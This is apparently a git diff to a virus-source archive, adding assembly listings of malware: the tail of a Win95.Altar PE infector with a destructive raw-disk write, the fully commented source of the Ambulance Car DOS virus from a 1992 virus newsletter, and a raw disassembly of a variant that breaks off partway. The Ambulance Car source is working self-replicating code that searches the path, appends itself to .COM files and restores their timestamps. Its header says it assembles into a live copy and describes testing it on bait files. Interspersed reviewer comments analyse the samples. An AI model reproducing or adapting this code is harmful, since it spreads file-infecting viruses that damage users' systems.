+ + MOV [EBP+(Busy_Switch-START)], EAX + + POPAD + POPFD + +JMP_Prev_Hook: JMP DS:[12345678h] +Prev_Handler = DWORD PTR $-4 + + + DB 'Awaiting the sacrifice...', 0 + + +Align_EAX: + XOR EDX, EDX + DIV ECX + + OR EDX, EDX + JZ Calc_Aligned + + INC EAX + +Calc_Aligned: MUL ECX + + RET + + +Get_Delta: + CALL Get_EIP +Get_EIP: POP EBP + SUB EBP, (Get_EIP-START) + + RET + + +Get_Random: + IN EAX, 40h + ADD EDX, EAX + +Randomize: IN EAX, 40h + XCHG AH, AL + + ADD EAX, 0DEADBEEFh + + RCL EDX, 3 + + XOR EDX, EAX + + LOOP Randomize + + RET + +Virus_End: + +ANSI_Target DB 260 DUP(0) + +Header DB 92 DUP(0) + +Last_Obj_Table DB 40 DUP(0) + +End_Virus_Mem: + + +Carrier: + PUSH 0 + CALL ExitProcess + + + + +; The good old MZ-header... + +MZ_Header STRUC +MZ_Mark DW 0 +MZ_Image_Mod_512 DW 0 +MZ_Image_512_Pages DW 0 +MZ_Reloc_Items DW 0 +MZ_Header_Size_Mem DW 0 +MZ_Min_Size_Mem DW 0 +MZ_Max_Size_Mem DW 0 +MZ_Program_SS DW 0 +MZ_Program_SP DW 0 +MZ_Checksum DW 0 +MZ_Program_IP DW 0 +MZ_Program_CS DW 0 +MZ_Reloc_Table DW 0 +MZ_Header ENDS + + +PE_Header STRUC +PE_Mark DD 0 ; PE-marker (PE/0/0). +CPU_Type DW 0 ; Minimal CPU required. +Object_Count DW 0 ; Number of sections in PE. + DD 0 +Reserved_1 DD 0 + DD 0 +NT_Header_Size DW 0 +PE_Flags DW 0 + DD 4 DUP(0) +EIP_RVA DD 0 + DD 2 DUP(0) +Image_Base DD 0 +Object_Align DD 0 +File_Align DD 0 + DW 0, 0 + DW 0, 0 + DW 0, 0 +PE_Reserved_5 DD 0 +Image_Size DD 0 +Headers_Size DD 0 +PE_Checksum DD 0 + DW 0 +DLL_Flags DW 0 +PE_Header ENDS + + +Section_Header STRUC +Section_Name DB 8 DUP(0) ; Zero-padded section-name. +Section_Virtual_Size DD 0 ; Memory-size of section. +Section_RVA DD 0 ; Start section in memory. +Section_Physical_Size DD 0 ; Section-size in file. +Section_Physical_Offset DD 0 ; Section file-offset. +Section_Reserved_1 DD 0 ; Not used for executables. +Section_Reserved_2 DD 0 ; Not used for executables. +Section_Reserved_3 DD 0 ; Not used for executables. +Section_Flags DD 0 ; Flags of the section. 
+Section_Header ENDS + + + END START diff --git a/MSDOS/Virus.MSDOS.Unknown.ambul.asm b/MSDOS/Virus.MSDOS.Unknown.ambul.asm new file mode 100644 index 00000000..eee57f0b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ambul.asm 
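Review bot: The file is committed as `MSDOS/Virus.MSDOS.Unknown.altar.asm`, but its own header (`NAME: Win95.Altar 1.01`, `OS: Windoze 95/98`, `TYPE: Parasitic resident (VxD) PE-infector`) and the `.386p` / `.MODEL FLAT` directives identify a 32-bit Windows 9x PE sample, so the archive path and the `Virus.MSDOS.` prefix misclassify it. Filing it with the Win9x/Win32 samples, or at least naming the platform in the file name, keeps directory-based triage of this repository trustworthy. It would also help to carry the header's `DESTRUCTIVE: Yeah` and the random-chance raw disk write in `Ring0_Hook` (`MOV AX, 0DE02h ; R0_WRITEABSOLUTEDISK`) into whatever index describes the sample, since nothing in the path signals a destructive payload.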
@@ -0,0 +1,523 @@ +;REDCROSS/AMBULANCE CAR VIRUS for Crypt Newsletter #10, edited by Urnst Kouch +;December 1992 +;Originally supplied as a Sourcer disassembly in a Scandinavian virus mag +;published by "Youth Against McAfee (YAM)", this AMBULANCE specimen was +;generated in its raw form by "Natas Kaupas." Hold that up to your mirror +;and it spells Satan. Whatever, "Natas/Satan" has also supplied us with the +;MINDLESS/FamR series of viruses for you trivia buffs. The Crypt Newsletter +;is obliged to him, wherever he is, for these interesting programs. +; +;In any case, while helpful, the original disassembly had diminished +;value, being completely uncommented. It did, however, assemble +;under TASM into an actual working copy of the virus, which +;appears to be the AMBULANCE CAR B strain. +; +; +;Ambulance Car remains an interesting virus, packed with enough features +;so that it can still find its target files, .COM executables, wherever +;they might be lurking on a system. +; +;Principally, this revolves around the virus searching the path string set +;in the environment. If no path exists, the virus defaults to the +;current directory. In both cases, the virus may infect up to two files +;anywhere on the path per pass. Most times it will infect only one. +;Sometimes it will not budge at all. +; +;Once it's found a file, Ambulance checks it for the 0E9h byte at +;the beginning. If it doesn't find it, the virus assumes the file is +;uninfected and immediately tries to complete the infection. If +;it does find the byte, it continues reading from there to confirm +;the viral sequence. If this is a coincidence and the complete sequence +;is not there, the virus will infect the file anyway. +; +;Randomly, the virus will activate and run the Ambulance across the bottom +;of your screen after a round of infection. Because of the path search +;Ambulance can easily find .COM executables on a sizeable disk at a time +;when there are less and less of these to be seen. 
Unfortunately, for a +;direct-action virus, the disk activity is noticeable with the caveats: +;on a fast machine, perhaps not; or in front of an average user, perhaps not. +;You never know how a user will react when dealing with viruses. +; +;You can easily experiment with this version on your machine by commenting +;out the path statement in your AUTOEXEC.BAT. This will restrict the +;virus to a test directory where it can be used to infect bait files +;until the Ambulance effect is seen. +; +;Ambulance Car is detected by "rules-based" anti-virus sentries like +;PCRx (reviewed in this issue), but keep in mind this type of +;protection is not flawless. Accidents can happen. Most current scanners +;easily detect this variant of Ambulance, although +;some cannot disinfect files once they are parasitized. + +data_1e equ 0Ch +data_2e equ 49h +data_3e equ 6Ch +psp_envirn_seg equ 2Ch +data_21e equ 0C80h + +virus segment byte public + assume cs:virus, ds:virus + + + org 100h + +redcross proc far ;main flow control procedure for Ambulance + ;Car virus +start: + jmp short virstart +data_5 dw 4890h ; Data table +data_7 dw 6C65h ; Data table + db 6Ch, 6Fh, 20h, 2Dh, 20h + +copyright db 'Copyright S & S Enterprises, 198';whoah, how'd Solomon's + db '8' ;stamp get in here? ;-] + db 0Ah, 0Dh, 24h, 1Ah,0B4h, 09h + db 0BAh, 03h, 01h,0CDh, 21h,0CDh + db 20h +virstart: + db 0E8h, 01h, 00h + add [bp-7Fh],bx + out dx,al ; port 0, channel 0 + add ax,[bx+di] + call check_infect ; do path search, infect file + call check_infect ; ditto, sometimes, sometimes not + call sound_fury ; do we do AMBULANCE effect? Check! 
+ lea bx,[si+419h] + mov di,100h + mov al,[bx] + mov [di],al + mov ax,[bx+1] + mov [di+1],ax + jmp di ; Register jump + +exit: + retn ; handoff to host + +redcross endp + +;***************************************************************************** +; SUBROUTINE +;***************************************************************************** + +check_infect proc near ; path search for Ambulance + call loadpath ; Car + mov al,byte ptr data_19[si] + or al,al + jz exit ; No path/no files? Git! + lea bx,[si+40Fh] + inc word ptr [bx] + lea dx,[si+428h] ; load effective address + mov ax,3D02h + int 21h ; open found file by loadpath read/write + ; with handle + mov word ptr ds:[417h][si],ax ;ax contains handle + mov bx,word ptr ds:[417h][si] + mov cx,3 + lea dx,[si+414h] ; load address of buffer + mov ah,3Fh ; to read first three bytes into. + int 21h ; Read the bytes . . . + ; bx points to file handle. + ; + mov al,byte ptr ds:[414h][si] + cmp al,0E9h ; compare with 0E9h + jne infect ; if not equal, assume virus not here - infect + mov dx,word ptr ds:[415h][si] + mov bx,word ptr ds:[417h][si] + add dx,3 + xor cx,cx ; zero register + mov ax,4200h + int 21h ; point to beginning of file, again + ; bx contains the handle + + mov bx,word ptr ds:[417h][si] + mov cx,6 + lea dx,[si+41Ch] ; load effective address + mov ah,3Fh ; and read the first 6 bytes + int 21h ; this time + + ; ds:dx points to buffer + mov ax,data_13[si] + mov bx,data_14[si] + mov cx,data_15[si] + cmp ax,word ptr ds:[100h][si] ; compare with data copied above + jne infect ; jump if not equal to infect + cmp bx,data_5[si] + jne infect ; jump if not equal + cmp cx,data_7[si] + je close ; finally, if we get a match we know +infect: ; we're here, so go to close up + mov bx,word ptr ds:[417h][si] + xor cx,cx ; zero register + xor dx,dx ; zero register + mov ax,4202h + int 21h ; reset pointer to end of file + ; bx contains file handle + + sub ax,3 + mov word ptr ds:[412h][si],ax + mov bx,word ptr ds:[417h][si] + 
mov ax,5700h ; bx points to name of file + int 21h ; get file date and time + ; time returns in cx, date in dx + + push cx ; push these onto the stack + push dx ; we'll need 'em later + mov bx,word ptr ds:[417h][si] + mov cx,319h + lea dx,[si+100h] + mov ah,40h ; write the virus to the end of + int 21h ; the file, identified in bx + ; cx contains virus length for write + ; so do it, yes, append virus + mov bx,word ptr ds:[417h][si] + mov cx,3 + lea dx,[si+414h] ; load effective address + mov ah,40h ; + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov bx,word ptr ds:[417h][si] + xor cx,cx ; zero register + xor dx,dx ; zero register + mov ax,4200h + int 21h ; reset the pointer to start of file + ; identified in bx + ; cx,dx=offset + mov bx,word ptr ds:[417h][si] + mov cx,3 + lea dx,[si+411h] ; load effective address + mov ah,40h ; and write the first three virus id + int 21h ; and jump bytes to the file + ; now, just about finished + + pop dx ; retrieve date + pop cx ; and time from stack + mov bx,word ptr ds:[417h][si] + mov ax,5701h ; restore file's date/time + int 21h + +close: + mov bx,word ptr ds:[417h][si] + mov ah,3Eh + int 21h ; close file + + retn ; return to caller, maybe we'll +check_infect endp ; infect again, maybe not + + +;***************************************************************************** +; SUBROUTINE +;***************************************************************************** + +loadpath proc near ; this procedure checks for the + mov ax,ds:psp_envirn_seg ; existence of the ASCII path string in the + mov es,ax ; environment block of the program + push ds ; segment prefix (in this case psp_envirn_seg) + mov ax,40h ; if it exists, Ambulance Car copies + mov ds,ax ; the entire string into a buffer by using + mov bp,ds:data_3e ; '/' and ';' as cues. The virus then + pop ds ; sets the DTA to a directory + test bp,3 ; found in the path and executes a simple + jz loc_8 ; file search. 
If unproductive, it + xor bx,bx ; recursively searches the path +loc_6: ; before defaulting to the current + mov ax,es:[bx] ; directory + cmp ax,4150h + jne loc_7 + cmp word ptr es:[bx+2],4854h + je loc_9 +loc_7: + inc bx + or ax,ax + jnz loc_6 ; jump if not zero +loc_8: + lea di,[si+428h] + jmp short loc_14 +loc_9: + add bx,5 +loc_10: + lea di,[si+428h] ; load effective address of buffer +loc_11: + mov al,es:[bx] + inc bx ; copy a byte from the path + or al,al + jz loc_13 ; jump if zero + cmp al,3Bh ; found a divider? ';' + je loc_12 ; jump if equal, continue copying path + mov [di],al + inc di + jmp short loc_11 ; loop around, continue copying +loc_12: + cmp byte ptr es:[bx],0 + je loc_13 + shr bp,1 ; Shift w/zeros fill + shr bp,1 ; Shift w/zeros fill + test bp,3 + jnz loc_10 ; Jump if not zero +loc_13: + cmp byte ptr [di-1],5Ch ; compare with '\' + je loc_14 ; jump if equal + mov byte ptr [di],5Ch ; compare with '\' + inc di +loc_14: + push ds + pop es + mov data_16[si],di + mov ax,2E2Ah + stosw ; copy portion of path, store ax to es:[di] + mov ax,4F43h + stosw ; Store ax to es:[di] + mov ax,4Dh + stosw ; Store ax to es:[di] + push es + mov ah,2Fh + int 21h ; get current DTA + ; move it into es:bx + mov ax,es + mov data_17[si],ax + mov data_18[si],bx + pop es + lea dx,[si+478h] ; address of filemask + mov ah,1Ah + int 21h ; set the DTA to first dir in path + ; disk xfer area, ds:dx + lea dx,[si+428h] ; load effective address + xor cx,cx ; zero register + mov ah,4Eh ; find first file + int 21h + + jnc loc_15 ; jump if carry = 0 + xor ax,ax + mov data_19[si],ax + jmp short loc_18 +loc_15: + push ds + mov ax,40h + mov ds,ax + ror bp,1 + xor bp,ds:data_3e + pop ds + test bp,7 + jz loc_16 ; Jump if zero + mov ah,4Fh + int 21h + ; find next file + jnc loc_15 ; jump if carry = 0 +loc_16: + mov di,data_16[si] + lea bx,[si+496h] +loc_17: + mov al,[bx] + inc bx + stosb ; Store al to es:[di] + or al,al + jnz loc_17 ; Jump if not zero +loc_18: + mov bx,data_18[si] + mov 
ax,data_17[si] + push ds + mov ds,ax + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area), ds:dx + pop ds + retn ; return to check_infect +loadpath endp + + +;***************************************************************************** +; SUBROUTINE +;***************************************************************************** + +sound_fury proc near ;sets up Ambulance Car effect, but + push es ; other than that, I have no idea + mov ax,word ptr ds:[40Fh][si] ; subroutines and procs from + and ax,7 ; here on down manage the + cmp ax,6 ; Ambulance Car graphic and + jne loc_19 ; siren effect + mov ax,40h + mov es,ax + mov ax,es:data_1e + or ax,ax + jnz loc_19 ; <= comment this out and you'll + inc word ptr es:data_1e ; get a corrupted version of the + call sub_5 ; Car effect everytime the virus +loc_19: ; executes. If you fiddle around + pop es ; with it enough you'll eventually + retn ; get the strain known as RedX-Any, +sound_fury endp ; for RedCross anytime. 
+ + +;***************************************************************************** +; SUBROUTINE +;***************************************************************************** + +sub_5 proc near + push ds + mov di,0B800h + mov ax,40h + mov ds,ax + mov al,ds:data_2e + cmp al,7 + jne loc_20 + mov di,0B000h +loc_20: + mov es,di + pop ds + mov bp,0FFF0h +loc_21: + mov dx,0 + mov cx,10h + +locloop_22: + call sub_8 + inc dx + loop locloop_22 ; Loop if cx > 0 + + call sub_7 + call sub_9 + inc bp + cmp bp,50h + jne loc_21 ; Jump if not equal + call sub_6 + push ds + pop es + retn +sub_5 endp + + +;***************************************************************************** +; SUBROUTINE +;***************************************************************************** + +sub_6 proc near ; cycles speaker on for siren + in al,61h ; port 61h, 8255 port B, read + and al,0FCh + out 61h,al ; port 61h, 8255 B - spkr, etc + ; al = 0, disable parity + retn +sub_6 endp + + +;***************************************************************************** +; SUBROUTINE +;***************************************************************************** + +sub_7 proc near ; more speaker stuff + mov dx,7D0h + test bp,4 + jz loc_23 + mov dx,0BB8h +loc_23: + in al,61h ; port 61h, 8255 port B, read + test al,3 + jnz loc_24 + or al,3 + out 61h,al ; port 61h, 8255 B - spkr, etc + mov al,0B6h + out 43h,al ; port 43h, 8253 wrt timr mode +loc_24: + mov ax,dx + out 42h,al ; port 42h, 8253 timer 2 spkr + mov al,ah + out 42h,al ; port 42h, 8253 timer 2 spkr + retn +sub_7 endp + + +;***************************************************************************** +; SUBROUTINE +;***************************************************************************** + +sub_8 proc near + push cx + push dx + lea bx,[si+3BFh] ; Load effective addr + add bx,dx + add dx,bp + or dx,dx ; Zero ? 
+ js loc_27 ; Jump if sign=1 + cmp dx,50h + jae loc_27 ; Jump if above or = + mov di,data_21e + add di,dx + add di,dx + sub dx,bp + mov cx,5 + +locloop_25: + mov ah,7 + mov al,[bx] + sub al,7 + add al,cl + sub al,dl + cmp cx,5 + jne loc_26 ; Jump if not equal + mov ah,0Fh + test bp,3 + jz loc_26 ; Jump if zero + mov al,20h ; ' ' +loc_26: + stosw ; Store ax to es:[di] + add bx,10h + add di,9Eh + loop locloop_25 ; Loop if cx > 0 + +loc_27: + pop dx + pop cx + retn +sub_8 endp + + +;***************************************************************************** +; SUBROUTINE +;***************************************************************************** + +sub_9 proc near + push ds + mov ax,40h + mov ds,ax + mov ax,ds:data_3e +loc_29: + cmp ax,ds:data_3e + je loc_29 ; Jump if equal + pop ds + retn +sub_9 endp + + db 22h, 23h, 24h, 25h + db 26h, 27h, 28h, 29h, 66h, 87h + db 3Bh, 2Dh, 2Eh, 2Fh, 30h, 31h + db 23h,0E0h,0E1h,0E2h,0E3h,0E4h + db 0E5h +data_8 dw 0E7E6h ; Data table (indexed access) + db 0E7h +data_9 dw 0EAE9h ; Data table (indexed access) +data_10 db 0EBh ; Data table (indexed access) +data_11 dw 3130h ; Data table (indexed access) +data_12 dw 2432h ; Data table (indexed access) + db 0E0h,0E1h,0E2h +data_13 dw 0E8E3h ; Data table (indexed access) +data_14 dw 0EA2Ah ; Data table (indexed access) +data_15 dw 0E8E7h ; Data table (indexed access) +data_16 dw 2FE9h ; Data table (indexed access) +data_17 dw 6D30h ; Data table (indexed access) +data_18 dw 3332h ; Data table (indexed access) +data_19 dw 0E125h ; Data table (indexed access) + db 0E2h,0E3h,0E4h,0E5h,0E7h,0E7h + db 0E8h,0E9h,0EAh,0EBh,0ECh,0EDh + db 0EEh,0EFh, 26h,0E6h,0E7h, 29h + db 59h, 5Ah, 2Ch,0ECh,0EDh,0EEh + db 0EFh,0F0h, 32h, 62h, 34h,0F4h + db 09h, 00h,0E9h, 36h, 00h,0EBh + db 2Eh, 90h, 05h, 00h,0EBh, 2Eh + db 90h + +virus ends + + + + end start + + diff --git a/MSDOS/Virus.MSDOS.Unknown.ambul3.asm b/MSDOS/Virus.MSDOS.Unknown.ambul3.asm new file mode 100644 index 00000000..ba4566c4 --- /dev/null 
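Review bot: The `virstart:` entry in `redcross` is mis-decoded: `db 0E8h,01h,00h` followed by `add [bp-7Fh],bx` / `out dx,al` / `add ax,[bx+di]` is one `call $+4` whose target lies inside those bytes (`5Eh` then `81h,0EEh,03h,01h`, i.e. `pop si` / `sub si,103h`), so the Sourcer comment `; port 0, channel 0` on the `out` is a decoding artefact and no port I/O happens there. Every later `[si+...]` and `data_xx[si]` reference in the file depends on that delta value, which the header prose never states; a comment on the `virstart:` line such as `; call $+4 / pop si / sub si,103h computes the load delta in SI; the add/out/add lines below are disassembler artefacts` would save analysts re-deriving it. The companion `ambul3.asm` listing in this same commit shows the identical bytes at `H00114`–`H0011B` with the artefact reproduced unchanged.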
+++ b/MSDOS/Virus.MSDOS.Unknown.ambul3.asm 
@@ -0,0 +1,390 @@ +;NAME: AMBUL3.C-M +;FILE SIZE: 00330h - 816d +;START (CS:IP): 00100h +;CODE END: 00430h +;CODE ORIGIN: 00100h +;DATE: Sun Aug 16 15:45:06 1992 + +CODE SEGMENT BYTE PUBLIC 'CODE' +ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING + +P00100 PROC + ORG 0100h + +H00100: JMP H00114 ;00100 E91100 ___ +;Will be overwritten with B4 09 BA-- MOV AH,09 and MOV DX +;--------------------------------------------------- + OR [BX+DI],AX ;00103 0901 __ +;DX gets this, location of string. + INT 21h ;Indef_INT:21h-AH ;00105 CD21 _! + INT 20h ;B-TERM_norm:20h ;00107 CD20 _ +;--------------------------------------------------- + DB "Infect me!$" ;00109 496E6665637420 +;--------------------------------------------------- +H00114: CALL H00118 ; . . . . . . . . . ;00114 E80100 ___ + ADD [BP-7Fh],BX ;00117 015E81 _^_ + OUT DX,AL ;Port_OUT:DX ;0011A EE _ + ADD AX,[BX+DI] ;0011B 0301 __ + CALL H0013A ; . . . . . . . . . ;0011D E81A00 ___ + CALL H0013A ; . . . . . . . . . ;00120 E81700 ___ + CALL H002F8 ; . . . . . . . . . ;00123 E8D201 ___ + LEA BX,[SI+0419h] ;00126 8D9C1904 ____ + MOV DI,0100h ;0012A BF0001 ___ + MOV AL,[BX] ;0012D 8A07 __ + MOV [DI],AL ;0012F 8805 __ + MOV AX,[BX+01h] ;00131 8B4701 _G_ + MOV [DI+01h],AX ;00134 894501 _E_ + JMP DI ;00137 FFE7 __ +;--------------------------------------------------- + RET ;RET_Near ;00139 C3 _ +;--------------------------------------------------- +H0013A: CALL H0021B ; . . . . . . . . . ;0013A E8DE00 ___ + MOV AL,[SI+0428h] ;0013D 8A842804 __(_ + OR AL,AL ;00141 0AC0 __ + JZ H00139 ;00143 74F4 t_ + LEA BX,[SI+040Fh] ;00145 8D9C0F04 ____ + INC Word Ptr [BX] ;00149 FF07 __ + LEA DX,[SI+0428h] ;0014B 8D942804 __(_ + MOV AX,3D02h ;0014F B8023D __= + INT 21h ;2-Open_Fl_Hdl ;00152 CD21 _! + MOV [SI+0417h],AX ;00154 89841704 ____ + MOV BX,[SI+0417h] ;00158 8B9C1704 ____ + MOV CX,0003h ;0015C B90300 ___ + LEA DX,[SI+0414h] ;0015F 8D941404 ____ + MOV AH,3Fh ;00163 B43F _? + INT 21h ;2-Rd_Fl_Hdl ;00165 CD21 _! 
+ MOV AL,[SI+0414h] ;00167 8A841404 ____ + CMP AL,0E9h ;0016B 3CE9 <_ + JNZ H001AE ;0016D 753F u? + MOV DX,[SI+0415h] ;0016F 8B941504 ____ + MOV BX,[SI+0417h] ;00173 8B9C1704 ____ + ADD DX,+03h ;00177 83C203 ___ + XOR CX,CX ;0017A 33C9 3_ + MOV AX,4200h ;0017C B80042 __B + INT 21h ;2-Mov_Fl_Hdl_Ptr ;0017F CD21 _! + MOV BX,[SI+0417h] ;00181 8B9C1704 ____ + MOV CX,0006h ;00185 B90600 ___ + LEA DX,[SI+041Ch] ;00188 8D941C04 ____ + MOV AH,3Fh ;0018C B43F _? + INT 21h ;2-Rd_Fl_Hdl ;0018E CD21 _! + MOV AX,[SI+041Ch] ;00190 8B841C04 ____ + MOV BX,[SI+041Eh] ;00194 8B9C1E04 ____ + MOV CX,[SI+0420h] ;00198 8B8C2004 __ _ + CMP AX,[SI+0100h] ;0019C 3B840001 ;___ + JNZ H001AE ;001A0 750C u_ + CMP BX,[SI+0102h] ;001A2 3B9C0201 ;___ + JNZ H001AE ;001A6 7506 u_ + CMP CX,[SI+0104h] ;001A8 3B8C0401 ;___ + JZ H00212 ;001AC 7464 td +H001AE: MOV BX,[SI+0417h] ;001AE 8B9C1704 ____ + XOR CX,CX ;001B2 33C9 3_ + XOR DX,DX ;001B4 33D2 3_ + MOV AX,4202h ;001B6 B80242 __B + INT 21h ;2-Mov_Fl_Hdl_Ptr ;001B9 CD21 _! + SUB AX,0003h ;001BB 2D0300 -__ + MOV [SI+0412h],AX ;001BE 89841204 ____ + MOV BX,[SI+0417h] ;001C2 8B9C1704 ____ + MOV AX,5700h ;001C6 B80057 __W + INT 21h ;2-Fl_Hdl_Date_Time ;001C9 CD21 _! + PUSH CX ;001CB 51 Q + PUSH DX ;001CC 52 R + MOV BX,[SI+0417h] ;001CD 8B9C1704 ____ + MOV CX,0319h ;001D1 B91903 ___ + LEA DX,[SI+0100h] ;001D4 8D940001 ____ + MOV AH,40h ;001D8 B440 _@ + INT 21h ;2-Wr_Fl_Hdl ;001DA CD21 _! + MOV BX,[SI+0417h] ;001DC 8B9C1704 ____ + MOV CX,0003h ;001E0 B90300 ___ + LEA DX,[SI+0414h] ;001E3 8D941404 ____ + MOV AH,40h ;001E7 B440 _@ + INT 21h ;2-Wr_Fl_Hdl ;001E9 CD21 _! + MOV BX,[SI+0417h] ;001EB 8B9C1704 ____ + XOR CX,CX ;001EF 33C9 3_ + XOR DX,DX ;001F1 33D2 3_ + MOV AX,4200h ;001F3 B80042 __B + INT 21h ;2-Mov_Fl_Hdl_Ptr ;001F6 CD21 _! + MOV BX,[SI+0417h] ;001F8 8B9C1704 ____ + MOV CX,0003h ;001FC B90300 ___ + LEA DX,[SI+0411h] ;001FF 8D941104 ____ + MOV AH,40h ;00203 B440 _@ + INT 21h ;2-Wr_Fl_Hdl ;00205 CD21 _! 
+ POP DX ;00207 5A Z + POP CX ;00208 59 Y + MOV BX,[SI+0417h] ;00209 8B9C1704 ____ + MOV AX,5701h ;0020D B80157 __W + INT 21h ;2-Fl_Hdl_Date_Time ;00210 CD21 _! +H00212: MOV BX,[SI+0417h] ;00212 8B9C1704 ____ + MOV AH,3Eh ;00216 B43E _> + INT 21h ;2-Close_Fl_Hdl ;00218 CD21 _! + RET ;RET_Near ;0021A C3 _ +;--------------------------------------------------- +H0021B: MOV AX,DS:[002Ch] ;0021B A12C00 _,_ + MOV ES,AX ;ES_Chg ;0021E 8EC0 __ + PUSH DS ;00220 1E _ + MOV AX,0040h ;00221 B84000 _@_ + MOV DS,AX ;DS_Chg ;00224 8ED8 __ + MOV BP,DS:[006Ch] ;00226 8B2E6C00 _.l_ + POP DS ;0022A 1F _ + TEST BP,0003h ;0022B F7C50300 ____ + JZ H00248 ;0022F 7417 t_ + XOR BX,BX ;00231 33DB 3_ + MOV AX,ES:[BX] ;ES_Ovrd ;00233 268B07 &__ + CMP AX,4150h ;00236 3D5041 =PA + JNZ H00243 ;00239 7508 u_ + CMP Word Ptr ES:[BX+02h],4854h + ;ES_Ovrd ;0023B 26817F025448 &___TH + JZ H0024E ;00241 740B t_ +H00243: INC BX ;00243 43 C + OR AX,AX ;00244 0BC0 __ + JNZ H00233 ;00246 75EB u_ +H00248: LEA DI,[SI+0428h] ;00248 8DBC2804 __(_ + JMP Short H00280 ;0024C EB32 _2 +;--------------------------------------------------- +H0024E: ADD BX,+05h ;0024E 83C305 ___ + LEA DI,[SI+0428h] ;00251 8DBC2804 __(_ + MOV AL,ES:[BX] ;ES_Ovrd ;00255 268A07 &__ + INC BX ;00258 43 C + OR AL,AL ;00259 0AC0 __ + JZ H00276 ;0025B 7419 t_ + CMP AL,3Bh ;0025D 3C3B <; + JZ H00266 ;0025F 7405 t_ + MOV [DI],AL ;00261 8805 __ + INC DI ;00263 47 G + JMP Short H00255 ;00264 EBEF __ +;--------------------------------------------------- +H00266: CMP Byte Ptr ES:[BX],00h + ;ES_Ovrd ;00266 26803F00 &_?_ + JZ H00276 ;0026A 740A t_ + SHR BP,1 ;0026C D1ED __ + SHR BP,1 ;0026E D1ED __ + TEST BP,0003h ;00270 F7C50300 ____ + JNZ H00251 ;00274 75DB u_ +H00276: CMP Byte Ptr [DI-01h],5Ch ;00276 807DFF5C _}_\ + JZ H00280 ;0027A 7404 t_ + MOV Byte Ptr [DI],5Ch ;0027C C6055C __\ + INC DI ;0027F 47 G +H00280: PUSH DS ;00280 1E _ + POP ES ;00281 07 _ + MOV [SI+0422h],DI ;00282 89BC2204 __"_ +;********* Put "*.COM" at ES:DI + MOV AX,2E2Ah ;00286 
B82A2E _*.
+ STOSW ;00289 AB _
+ MOV AX,4F43h ;0028A B8434F _CO
+ STOSW ;0028D AB _
+ MOV AX,004Dh ;0028E B84D00 _M_
+ STOSW ;00291 AB _
+;**********
+ PUSH ES ;00292 06 _
+ MOV AH,2Fh ;00293 B42F _/
+ INT 21h ;2-Get_DTA ;00295 CD21 _!
+ MOV AX,ES ;00297 8CC0 __
+ MOV [SI+0424h],AX ;00299 89842404 __$_
+ MOV [SI+0426h],BX ;0029D 899C2604 __&_
+ POP ES ;002A1 07 _
+ LEA DX,[SI+0478h] ;002A2 8D947804 __x_
+ MOV AH,1Ah ;002A6 B41A __
+ INT 21h ;1-Set_DTA ;002A8 CD21 _!
+ LEA DX,[SI+0428h] ;002AA 8D942804 __(_
+ XOR CX,CX ;002AE 33C9 3_
+ MOV AH,4Eh ;002B0 B44E _N
+ INT 21h ;2-Srch_1st_Fl_Hdl ;002B2 CD21 _!
+ JNB H002BE ;002B4 7308 s_
+ XOR AX,AX ;002B6 33C0 3_
+ MOV [SI+0428h],AX ;002B8 89842804 __(_
+ JMP Short H002E7 ;002BC EB29 _)
+;---------------------------------------------------
+H002BE: PUSH DS ;002BE 1E _
+ MOV AX,0040h ;002BF B84000 _@_
+ MOV DS,AX ;DS_Chg ;002C2 8ED8 __
+ ROR BP,1 ;002C4 D1CD __
+ XOR BP,DS:[006Ch] ;002C6 332E6C00 3.l_
+ POP DS ;002CA 1F _
+ TEST BP,0007h ;002CB F7C50700 ____
+ JZ H002D7 ;002CF 7406 t_
+ MOV AH,4Fh ;002D1 B44F _O
+ INT 21h ;2-Srch_Nxt_Fl_Hdl ;002D3 CD21 _!
+ JNB H002BE ;002D5 73E7 s_
+H002D7: MOV DI,[SI+0422h] ;002D7 8BBC2204 __"_
+ LEA BX,[SI+0496h] ;002DB 8D9C9604 ____
+ MOV AL,[BX] ;002DF 8A07 __
+ INC BX ;002E1 43 C
+ STOSB ;002E2 AA _
+ OR AL,AL ;002E3 0AC0 __
+ JNZ H002DF ;002E5 75F8 u_
+H002E7: MOV BX,[SI+0426h] ;002E7 8B9C2604 __&_
+ MOV AX,[SI+0424h] ;002EB 8B842404 __$_
+ PUSH DS ;002EF 1E _
+ MOV DS,AX ;DS_Chg ;002F0 8ED8 __
+ MOV AH,1Ah ;002F2 B41A __
+ INT 21h ;1-Set_DTA ;002F4 CD21 _!
+ POP DS ;002F6 1F _
+ RET ;RET_Near ;002F7 C3 _
+;---------------------------------------------------
+H002F8: PUSH ES ;002F8 06 _
+ MOV AX,[SI+040Fh] ;002F9 8B840F04 ____
+ AND AX,0007h ;002FD 250700 %__
+ CMP AX,0006h ;00300 3D0600 =__
+ JNZ H0031A ;00303 7515 u_
+ MOV AX,0040h ;00305 B84000 _@_
+ MOV ES,AX ;ES_Chg ;00308 8EC0 __
+ MOV AX,ES:[000Ch] ;ES_Ovrd ;0030A 26A10C00 &___
+ OR AX,AX ;0030E 0BC0 __
+ JNZ H0031A ;00310 7508 u_
+ INC Word Ptr ES:[000Ch]
+ ;ES_Ovrd ;00312 26FF060C00 &____
+ CALL H0031C ; . . . . . . . . . ;00317 E80200 ___
+H0031A: POP ES ;0031A 07 _
+ RET ;RET_Near ;0031B C3 _
+;---------------------------------------------------
+H0031C: PUSH DS ;0031C 1E _
+ MOV DI,0B800h ;0031D BF00B8 ___
+ MOV AX,0040h ;00320 B84000 _@_
+ MOV DS,AX ;DS_Chg ;00323 8ED8 __
+ MOV AL,DS:[0049h] ;00325 A04900 _I_
+ CMP AL,07h ;00328 3C07 <_
+ JNZ H0032F ;0032A 7503 u_
+ MOV DI,0B000h ;0032C BF00B0 ___
+H0032F: MOV ES,DI ;ES_Chg ;0032F 8EC7 __
+ POP DS ;00331 1F _
+ MOV BP,0FFF0h ;00332 BDF0FF ___
+ MOV DX,0000h ;00335 BA0000 ___
+ MOV CX,0010h ;00338 B91000 ___
+ CALL H0037D ; . . . . . . . . . ;0033B E83F00 _?_
+ INC DX ;0033E 42 B
+ LOOP H0033B ;0033F E2FA __
+ CALL H0035A ; . . . . . . . . . ;00341 E81600 ___
+ CALL H003C2 ; . . . . . . . . . ;00344 E87B00 _{_
+ INC BP ;00347 45 E
+ CMP BP,+50h ;00348 83FD50 __P
